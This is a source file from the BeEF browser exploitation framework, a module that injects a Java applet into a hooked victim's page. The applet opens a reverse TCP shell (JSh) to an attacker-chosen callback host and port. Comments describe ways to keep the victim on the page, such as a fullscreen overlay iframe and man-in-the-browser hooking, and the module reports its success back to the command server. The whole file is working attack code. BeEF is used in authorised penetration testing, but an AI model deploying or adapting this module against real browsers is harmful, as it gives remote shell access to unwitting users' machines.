Path: blob/master/modules/exploits/local_host/java_payload/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var conn = '<%= @conn %>';9var cbHost = '<%= @cbHost %>';10var cbPort = '<%= @cbPort %>';11var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';12var applet_id = '<%= @applet_id %>';13var applet_name = '<%= @applet_name %>';1415beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',16null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);171819//TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).20//TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.212223//TODO: =========== persistence techniques ===========24// the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to25// download platform dependent executable (i.e. meterpreter) and then kill the applet.26// we have 2 options:27// 1. use the MITB code (currently doesn't work on IE)28// 2. create an overlay iFrame while having the applet runnin in the background29//30// 1. setTimeout(beef.dom.createIframe('fullscreen', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);31// 2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);32// var MITBload = setInterval(function(){33// if(beef.pageIsLoaded){34// clearInterval(MITBload);35// beef.mitb.hook();36// }37// }, 100);383940beef.debug('[Java Payload] Applet with id[' + applet_id + '] added to the DOM.');41beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');424344});454647